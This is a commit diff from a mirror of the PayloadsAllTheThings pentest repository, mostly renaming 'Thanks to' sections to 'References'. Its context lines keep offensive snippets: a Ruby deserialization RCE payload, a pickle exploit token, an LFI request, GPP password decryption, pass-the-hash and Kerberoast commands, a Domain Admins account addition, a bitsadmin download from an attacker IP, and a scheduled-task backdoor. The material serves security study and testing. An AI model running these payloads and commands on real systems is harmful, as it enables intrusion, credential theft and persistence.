mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-23 10:15:07 +00:00
Adding references sectio
This commit is contained in:
parent
9c529535a5
commit
a6475a19d9
52 changed files with 127 additions and 65 deletions
|
@ -149,7 +149,7 @@ List of Fortune1000 company names with permutations on .com, -backup, -media. Fo
|
||||||
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
|
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
|
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
|
||||||
* https://digi.ninja/projects/bucket_finder.php
|
* https://digi.ninja/projects/bucket_finder.php
|
||||||
|
|
|
@ -95,7 +95,7 @@ Remainder:
|
||||||
* %E5%98%BE = %3E = \u563e (>)
|
* %E5%98%BE = %3E = \u563e (>)
|
||||||
* %E5%98%BC = %3C = \u563c (<)
|
* %E5%98%BC = %3C = \u563c (<)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* https://www.owasp.org/index.php/CRLF_Injection
|
* https://www.owasp.org/index.php/CRLF_Injection
|
||||||
* https://vulners.com/hackerone/H1:192749
|
* https://vulners.com/hackerone/H1:192749
|
||||||
|
|
|
@ -25,7 +25,7 @@ Any formula can be started with
|
||||||
@
|
@
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
|
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
|
||||||
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
|
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
|
||||||
|
|
|
@ -339,7 +339,7 @@ Use the LFI to include the PHP session file
|
||||||
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
|
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
||||||
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
||||||
|
|
|
@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget
|
||||||
|
|
||||||
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
|
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||||
|
|
|
@ -153,7 +153,7 @@ phpggc monolog/rce1 'phpinfo();' -s
|
||||||
* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
|
* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
|
||||||
* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
|
* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
|
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
|
||||||
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
|
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
|
||||||
|
|
|
@ -44,7 +44,7 @@ evil_token = b64encode(cPickle.dumps(e))
|
||||||
print("Your Evil Token : {}").format(evil_token)
|
print("Your Evil Token : {}").format(evil_token)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
|
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
|
||||||
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
|
|
@ -9,7 +9,7 @@ Check the following sub-sections, located in other files :
|
||||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||||
* [Python : pickle, ...](Python.md)
|
* [Python : pickle, ...](Python.md)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
* [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||||
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||||
|
|
|
@ -6,7 +6,7 @@ Script to generate and verify the deserialization gadget chain against Ruby 2.0
|
||||||
for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
|
for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
|
@ -41,7 +41,7 @@ http://foo.bar/accessPage?menuitem=12
|
||||||
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
|
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
|
||||||
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
|
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
||||||
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
|
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
|
||||||
|
|
|
@ -2,8 +2,18 @@
|
||||||
|
|
||||||
## Springboot-Actuator
|
## Springboot-Actuator
|
||||||
|
|
||||||
Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. Some of them contains sensitive info such as `/trace` (by default the last 100 HTTP requests with headers), `/env` (the current environment properties) or `/heapdump` (builds and returns a heap dump from the JVM used by our application). These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
|
Actuator endpoints let you monitor and interact with your application.
|
||||||
|
Spring Boot includes a number of built-in endpoints and lets you add your own.
|
||||||
|
For example, the health endpoint provides basic application health information.
|
||||||
|
Some of them contains sensitive info such as :
|
||||||
|
|
||||||
the official documentation is located [here](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
- `/trace` (by default the last 100 HTTP requests with headers)
|
||||||
|
- `/env` (the current environment properties)
|
||||||
|
- `/heapdump` (builds and returns a heap dump from the JVM used by our application).
|
||||||
|
|
||||||
## Thanks to
|
These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|
||||||
|
|
|
@ -167,7 +167,7 @@ git clone https://github.com/anantshri/svn-extractor.git
|
||||||
python svn-extractor.py –url "url with .svn available"
|
python svn-extractor.py –url "url with .svn available"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
|
||||||
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
|
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
|
||||||
|
|
|
@ -136,7 +136,7 @@ Secret is "Sn1f"
|
||||||
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
||||||
- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
|
- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
|
||||||
|
|
|
@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx
|
||||||
userPassword:2.5.13.18:=\xx\xx\xx
|
userPassword:2.5.13.18:=\xx\xx\xx
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
||||||
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
||||||
|
|
|
@ -66,7 +66,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
|
||||||
\input{|"/bin/hostname"}
|
\input{|"/bin/hostname"}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
||||||
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
||||||
|
|
|
@ -85,7 +85,7 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||||
```powershell
|
```powershell
|
||||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||||
ls # list files
|
ls # list files
|
||||||
cd
|
cd # move inside a folder
|
||||||
get # download files
|
get # download files
|
||||||
put # replace a file
|
put # replace a file
|
||||||
```
|
```
|
||||||
|
@ -94,6 +94,18 @@ or
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||||
|
Sharename Type Comment
|
||||||
|
--------- ---- -------
|
||||||
|
ADMIN$ Disk Remote Admin
|
||||||
|
C$ Disk Default share
|
||||||
|
IPC$ IPC Remote IPC
|
||||||
|
NETLOGON Disk Logon server share
|
||||||
|
Replication Disk
|
||||||
|
SYSVOL Disk Logon server share
|
||||||
|
Users Disk
|
||||||
|
use Sharename # select a Sharename
|
||||||
|
cd Folder # move inside a folder
|
||||||
|
ls # list files
|
||||||
```
|
```
|
||||||
|
|
||||||
Mount a share
|
Mount a share
|
||||||
|
@ -117,7 +129,10 @@ Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter
|
||||||
```bash
|
```bash
|
||||||
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||||
|
|
||||||
e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
e.g:
|
||||||
|
echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||||
|
|
||||||
|
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||||
```
|
```
|
||||||
|
|
||||||
Metasploit modules to enumerate shares and credentials
|
Metasploit modules to enumerate shares and credentials
|
||||||
|
@ -319,7 +334,7 @@ TODO
|
||||||
### Kerberoast
|
### Kerberoast
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
|
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
|
||||||
|
|
||||||
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
|
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
|
||||||
|
|
||||||
|
@ -337,11 +352,6 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
|
||||||
./john ~/hash.txt --wordlist=rockyou.lst
|
./john ~/hash.txt --wordlist=rockyou.lst
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
- https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
|
|
||||||
- https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
|
||||||
- https://room362.com/post/2016/kerberoast-pt1/
|
|
||||||
|
|
||||||
### Pass-the-Hash
|
### Pass-the-Hash
|
||||||
|
|
||||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
|
||||||
|
@ -463,7 +473,7 @@ net user hacker2 hacker123 /add /Domain
|
||||||
net group "Domain Admins" hacker2 /add /domain
|
net group "Domain Admins" hacker2 /add /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
## Documentation / Thanks to
|
## References
|
||||||
|
|
||||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||||
|
@ -491,3 +501,6 @@ net group "Domain Admins" hacker2 /add /domain
|
||||||
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
|
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
|
||||||
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
|
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
|
||||||
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
|
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
|
||||||
|
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
|
||||||
|
* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
|
||||||
|
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
|
||||||
|
|
|
@ -121,7 +121,7 @@ The following directories are temporary and usually writeable
|
||||||
/dev/shm/
|
/dev/shm/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
||||||
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
|
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
|
||||||
|
|
|
@ -158,6 +158,6 @@ Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 3
|
||||||
* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
|
* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
|
||||||
* MS08_67 - `exploit/windows/smb/ms08_067_netapi`
|
* MS08_67 - `exploit/windows/smb/ms08_067_netapi`
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
|
* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
|
||||||
|
|
|
@ -268,7 +268,7 @@ International test card numbers and tokens
|
||||||
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
| 4000002460000001 | tok_fi | Finland (FI) | Visa |
|
||||||
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
| 4000002500000003 | tok_fr | France (FR) | Visa |
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
|
* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
|
||||||
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
|
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
|
||||||
|
|
|
@ -135,6 +135,6 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
|
||||||
If you have a segfault with nbtscan, read the following quote.
|
If you have a segfault with nbtscan, read the following quote.
|
||||||
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
* [TODO](TODO)
|
* [TODO](TODO)
|
|
@ -165,7 +165,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
|
||||||
| remote host 1 | `ncat -l -p 8080 < file |
|
| remote host 1 | `ncat -l -p 8080 < file |
|
||||||
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
| remote host 2 | `ncat -l -p 9090 > newfile` |
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
|
||||||
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
|
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
|
||||||
|
|
|
@ -223,7 +223,7 @@ stty rows <num> columns <cols>
|
||||||
!sh
|
!sh
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||||
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
||||||
|
|
|
@ -177,7 +177,7 @@ go get github.com/Ice3man543/SubOver
|
||||||
./SubOver -l subdomains.txt
|
./SubOver -l subdomains.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
* [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
|
* [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
|
||||||
* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
|
* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
|
|
@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||||
|
|
|
@ -85,7 +85,7 @@ More informations can be grabbed from the Memory with :
|
||||||
|
|
||||||
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
|
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
||||||
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
||||||
|
|
|
@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
|
@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie.
|
||||||
implant/utils/multi_module | Run a number of implants in succession.
|
implant/utils/multi_module | Run a number of implants in succession.
|
||||||
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
|
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
|
||||||
|
|
||||||
## Thanks
|
## References
|
||||||
|
|
||||||
- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
|
- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
|
||||||
- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
|
- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
|
|
@ -206,7 +206,7 @@ wsl whoami
|
||||||
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## References
|
||||||
|
|
||||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||||
|
|
|
@ -137,7 +137,7 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
|
||||||
